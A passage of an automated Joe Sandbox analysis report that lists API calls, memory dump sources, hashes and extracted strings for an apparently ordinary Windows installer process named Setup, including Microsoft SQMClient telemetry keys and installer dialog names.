                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleWritemalloc
                                                                                              • String ID: x
                                                                                              • API String ID: 4113784837-2363233923
                                                                                              • Opcode ID: 373afd6dd4eb0f0f6b7c336daadb8d901aac65d0c43243932ab57a773181adea
                                                                                              • Instruction ID: 681781a582b535fc1f1fbdb2d4645fa16e2456a5ecf01bdd8aff7990d05c2bc2
                                                                                              • Opcode Fuzzy Hash: 373afd6dd4eb0f0f6b7c336daadb8d901aac65d0c43243932ab57a773181adea
                                                                                              • Instruction Fuzzy Hash: AD02AE309413599FDB15CF88CC85FAF7BB5BB49318F224599E920ABA61C331ED84CB54
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639548BD
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 63951F81: __EH_prolog3.LIBCMT ref: 63951F88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Drive1$Drive2$Drive3$Placement$Text
                                                                                              • API String ID: 431132790-3260609399
                                                                                              • Opcode ID: 82d5f5731c55b29e30ca54c4fadfb99e721469887342cc756751527240cfe7ae
                                                                                              • Instruction ID: bcf3f9409c3d2df40fbfe4e1a905df14996e9e8dd4bcd54184e53ad51809950d
                                                                                              • Opcode Fuzzy Hash: 82d5f5731c55b29e30ca54c4fadfb99e721469887342cc756751527240cfe7ae
                                                                                              • Instruction Fuzzy Hash: 9B714D71905248DFEB00DBE8C944BDEBBB8AF29B18F184198F514E7282CB35DA45DF61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957FE7
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • PathGetDriveNumberW.SHLWAPI(?,?,?,00000014,63959180,?,?,?,?,?,?,?,?), ref: 63958015
                                                                                              • PathGetDriveNumberW.SHLWAPI(?), ref: 6395801C
                                                                                              • PathGetDriveNumberW.SHLWAPI(?,?,?,?), ref: 63958064
                                                                                              • PathGetDriveNumberW.SHLWAPI(?), ref: 6395806B
                                                                                              • PathGetDriveNumberW.SHLWAPI(00000001,00000001,?,?), ref: 639580B3
                                                                                              • PathGetDriveNumberW.SHLWAPI(?), ref: 639580BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DriveNumberPath$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 2285536258-0
                                                                                              • Opcode ID: b8f9ceb3eca95ab724989acedfa5a5e9430b8bd8265802cec882478b017f9e2f
                                                                                              • Instruction ID: 0a5218f0e77690a73d42a97b8f41ab681f26bd0412be6b708919289832379418
                                                                                              • Opcode Fuzzy Hash: b8f9ceb3eca95ab724989acedfa5a5e9430b8bd8265802cec882478b017f9e2f
                                                                                              • Instruction Fuzzy Hash: AA81F7759043099FCB04DF68C48499DBBB1FF49738B29C599E858AB3A1C731E991CF90
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C5DE1F0
                                                                                              • GetThreadPriority.KERNEL32(00000000,?,6C5DBFF6,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5DE1F3
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C5DE201
                                                                                              • SetThreadPriority.KERNEL32(00000000,?,6C5DBFF6,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5DE204
                                                                                              • GetCurrentThread.KERNEL32 ref: 6C5DE313
                                                                                              • SetThreadPriority.KERNEL32(00000000,?,6C5DBFF6,?,00000000,00000000,?,?,?,PUT,00000000,?,Function_00007AF4), ref: 6C5DE31A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CurrentPriority
                                                                                              • String ID:
                                                                                              • API String ID: 1343868529-0
                                                                                              • Opcode ID: dfda4ccb6d2e3af210f7bb52f6b7ed5530dab6e3f248c261db3429e2b962b65a
                                                                                              • Instruction ID: 53511f9760f657b6335696bf3100c1e2554fda2764ddbbb0baf2bc20ceb31858
                                                                                              • Opcode Fuzzy Hash: dfda4ccb6d2e3af210f7bb52f6b7ed5530dab6e3f248c261db3429e2b962b65a
                                                                                              • Instruction Fuzzy Hash: 62519030A002949BCB15DF28CC88E99B7F6AB89344F560499F159D7B50C7B0EDC4CF98
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(Winhttp.dll), ref: 6C5D41C6
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6C5D41D5
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,?,?,?,?,?), ref: 6C5D41F9
                                                                                                • Part of subcall function 6C5D4281: memset.MSVCRT ref: 6C5D42CF
                                                                                                • Part of subcall function 6C5D4281: EnterCriticalSection.KERNEL32(00000030,?,00000104,?,80000002,Software\Microsoft\SQMClient,DoNotDeleteFileAfterUpload,?,00000000,?,6C5F0168), ref: 6C5D434C
                                                                                                • Part of subcall function 6C5D4281: FindFirstFileW.KERNEL32(?,?,?,6C5F0168), ref: 6C5D4392
                                                                                                • Part of subcall function 6C5D4281: LeaveCriticalSection.KERNEL32(?,?,6C5F0168), ref: 6C5D43CD
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 6C5D424A
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?), ref: 6C5D4253
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeaveLibrary$ErrorFileFindFirstFreeLastLoadmemset
                                                                                              • String ID: Winhttp.dll
                                                                                              • API String ID: 4214541343-1936088768
                                                                                              • Opcode ID: 848bdb6ab4869d5e71ff47b52c6d9cf2bb527ffc054eca157d409f9b70cb8baa
                                                                                              • Instruction ID: c737f089e59645e49148b202bd72a5b8e322aba8d429027c5baa4eca77d8b5f8
                                                                                              • Opcode Fuzzy Hash: 848bdb6ab4869d5e71ff47b52c6d9cf2bb527ffc054eca157d409f9b70cb8baa
                                                                                              • Instruction Fuzzy Hash: CC51F131245380EBCB45DF5CCC84FAA7AB5BB82358F670456F925DADA1C3B1E8848F58
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5D5875
                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 6C5D58A7
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 6C5E2890
                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000012,6C5E5B28,00000000), ref: 6C5E28C6
                                                                                              • GetLastError.KERNEL32 ref: 6C5E28D1
                                                                                              • GetLastError.KERNEL32 ref: 6C5E294D
                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000011,6C5E5B28,00000000), ref: 6C5E2967
                                                                                                • Part of subcall function 6C5D58E8: GetFileAttributesW.KERNEL32(6C5D5892,?,6C5D5892,00000000), ref: 6C5D58F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Path$AttributesCreateDirectoryFileLongNameTemp
                                                                                              • String ID:
                                                                                              • API String ID: 4207547965-0
                                                                                              • Opcode ID: 32c47991f0299aa789022e533d97f38132653f1dfebae897be48f538ca4cde46
                                                                                              • Instruction ID: 6dd0b867a507691da761e3df37ac1aeb5482eb95a7afbb87700d0fc3bddb0a80
                                                                                              • Opcode Fuzzy Hash: 32c47991f0299aa789022e533d97f38132653f1dfebae897be48f538ca4cde46
                                                                                              • Instruction Fuzzy Hash: B541B030241315ABCB159B558C48F9A3BF8EF4D358FA24452F825DAA61C371D8C48F69
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E8568
                                                                                                • Part of subcall function 6C5E8316: LocalFree.KERNEL32(?), ref: 6C5E8527
                                                                                                • Part of subcall function 6C5E8097: memset.MSVCRT ref: 6C5E80D6
                                                                                                • Part of subcall function 6C5E8097: memset.MSVCRT ref: 6C5E80EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$FreeLocal
                                                                                              • String ID: *.psqm$*.sqm$CabSessionAfterSize$Microsoft\Windows\Sqm\Sessions$Microsoft\Windows\Sqm\Upload$Software\Microsoft\SQMClient\Windows
                                                                                              • API String ID: 1741899810-2150350095
                                                                                              • Opcode ID: 3bad25c55a68ab9d6a3b9021d295568c143bd2a1e8cc4f26575fe2568646cde1
                                                                                              • Instruction ID: 50403fb065b02a6ae50b03bde4266bea2d7ad230dc0041018ef9d68c60bdb8db
                                                                                              • Opcode Fuzzy Hash: 3bad25c55a68ab9d6a3b9021d295568c143bd2a1e8cc4f26575fe2568646cde1
                                                                                              • Instruction Fuzzy Hash: FF310631601384AACB059A5C8CD4FBA37F9ABDD30CF7904ABE525D6E51C361CC498B52
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D7B80
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                              • String ID: $%s\%s$IsTest$MSFTInternal$Software\Microsoft\SQMClient$Software\Policies\Microsoft\SQMClient
                                                                                              • API String ID: 1830152886-857506278
                                                                                              • Opcode ID: e49faafd55b5bad72aba25d28bd8e59eb975db4b3106408241cb8379e3f6d8d2
                                                                                              • Instruction ID: 7cfe52dd5ae6b6a7605e3d9ff15ee608afd3e68795e3e7335656999662d0eb4f
                                                                                              • Opcode Fuzzy Hash: e49faafd55b5bad72aba25d28bd8e59eb975db4b3106408241cb8379e3f6d8d2
                                                                                              • Instruction Fuzzy Hash: CC31A3B094131CAADB10DB188C88FDAB7BCEB54348F1205E5A518E2651D770AE858FA9
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6C5D9CB8
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 6C5D9CEB
                                                                                              • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000000), ref: 6C5D9D02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCompareExchangeInterlockedLibraryLoadProc
                                                                                              • String ID: $
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$H_prolog3_Version
                                                                                              • String ID: Z$rtf
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6C5D329D
                                                                                              • VirtualFree.KERNEL32(?,?,00004000,00000000,?,6C5D3279,?,6C5D3238,00000000,?,?,00000000,00000000,?), ref: 6C5DB502
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,6C5D3279,?,6C5D3238,00000000,?,?,00000000,00000000,?), ref: 6C5DB511
                                                                                              • ctype.LIBCPMT ref: 6C5DB52F
                                                                                              • ctype.LIBCPMT ref: 6C5DB549
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtualctype$DecrementInterlocked
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63951B6A
                                                                                              • GetParent.USER32(00000065), ref: 63951B80
                                                                                                • Part of subcall function 6394F415: GetDlgItem.USER32(?,00003024), ref: 6394F479
                                                                                                • Part of subcall function 6394F415: GetWindowLongW.USER32(00000000,000000EB), ref: 6394F484
                                                                                                • Part of subcall function 6394F415: SetWindowLongW.USER32(00000000,000000EB,00000001), ref: 6394F4C4
                                                                                              • PostMessageW.USER32(00000065,00000028,00000000,00000000), ref: 63951BDF
                                                                                              • SetWindowLongW.USER32(00000065,000000F4,00000065), ref: 63951BE7
                                                                                              • GetParent.USER32(00000065), ref: 63951BF2
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 63951BFA
                                                                                              • PostMessageW.USER32(00000065,000006F5,00000000,00000000), ref: 63951C0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MessageParentPost$H_prolog3ItemText
                                                                                              • String ID:
                                                                                              APIs
                                                                                                • Part of subcall function 63966041: __EH_prolog3.LIBCMT ref: 63966048
                                                                                                • Part of subcall function 63966041: GetCommandLineW.KERNEL32(0000001C,639530C2,?), ref: 6396604D
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 63953136
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandExceptionH_prolog3LineRaise
                                                                                              • String ID: CreateLayout$Install$Repair$Uninstall$UninstallPatch
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395FB56
                                                                                              • GetParent.USER32(00000001), ref: 6395FB6B
                                                                                              • SendMessageW.USER32(00000000,00000481,00000001,00000000), ref: 6395FB78
                                                                                              • GetParent.USER32(00000001), ref: 6395FBB5
                                                                                              • SendMessageW.USER32(00000000,0000047E,?,?), ref: 6395FBC1
                                                                                              • GetParent.USER32(00000001), ref: 6395FBD3
                                                                                              • SendMessageW.USER32(00000000,00000480,?,?), ref: 6395FBDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageParentSend$H_prolog3
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394EE9C
                                                                                              • FreeLibrary.KERNEL32(00000000,0000000C,63965B81,?,?,?), ref: 6394EED4
                                                                                              • LoadLibraryW.KERNEL32(?,0000000C,63965B81,?,?,?), ref: 6394EEE8
                                                                                              • GetLastError.KERNEL32(00000000), ref: 6394EF03
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6394EF35
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$ErrorException@8FreeH_prolog3LastLoadThrow
                                                                                              • String ID: LoadLibrary
                                                                                              APIs
                                                                                                • Part of subcall function 6394E389: GetParent.USER32 ref: 6394E390
                                                                                                • Part of subcall function 6394E389: PostMessageW.USER32(00000000,00000470,00000000,?), ref: 6394E3A1
                                                                                                • Part of subcall function 6394E36B: GetParent.USER32(?), ref: 6394E36D
                                                                                                • Part of subcall function 6394E36B: SendMessageW.USER32(00000000,0000046B,00000000,00000000), ref: 6394E37D
                                                                                              • GetParent.USER32(00000069), ref: 6395B6D1
                                                                                              • GetSystemMenu.USER32(00000000,00000000,0000F060,00000000,?,?,00000000,639620A8,00000001,?,63962023,?,000006F5,?,?,?), ref: 6395B6DD
                                                                                              • EnableMenuItem.USER32(00000000), ref: 6395B6E4
                                                                                              • SetWindowLongW.USER32(00000069,000000F4,00000069), ref: 6395B6F0
                                                                                              • GetParent.USER32(00000069), ref: 6395B6FB
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395B6FF
                                                                                              • PostMessageW.USER32(00000069,000006F5,00000000,00000000), ref: 6395B710
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent$Message$MenuPostWindow$EnableItemLongSendSystemText
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964ED5
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Eula$None$Progress Page$SystemRequirement$Welcome
                                                                                              • API String ID: 431132790-1170989405
                                                                                              • Opcode ID: d829e41b2d7f5e472e19e66a05fb5a991663cb501d6351a966740d6815b9041a
                                                                                              • Instruction ID: aaab98782e6055e0709417ded815f70f699b63ae92bd09099e215e9b8eb61957
                                                                                              • Opcode Fuzzy Hash: d829e41b2d7f5e472e19e66a05fb5a991663cb501d6351a966740d6815b9041a
                                                                                              • Instruction Fuzzy Hash: E301A4F1A0230487AF11DFE8489007EB1A9AF9BD64BAA051AF150CB251C730CD02DF81
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,63977FA8,00000008,63969BB6,00000000,00000000,?,6396B575,63969054,?,?,639691D6,?), ref: 63969ABA
                                                                                              • __lock.LIBCMT ref: 63969AEE
                                                                                                • Part of subcall function 6396EA00: __mtinitlocknum.LIBCMT ref: 6396EA16
                                                                                                • Part of subcall function 6396EA00: __amsg_exit.LIBCMT ref: 6396EA22
                                                                                                • Part of subcall function 6396EA00: EnterCriticalSection.KERNEL32(639691D6,639691D6,?,63969AF3,0000000D), ref: 6396EA2A
                                                                                              • InterlockedIncrement.KERNEL32(83EC8B55), ref: 63969AFB
                                                                                              • __lock.LIBCMT ref: 63969B0F
                                                                                              • ___addlocaleref.LIBCMT ref: 63969B2D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
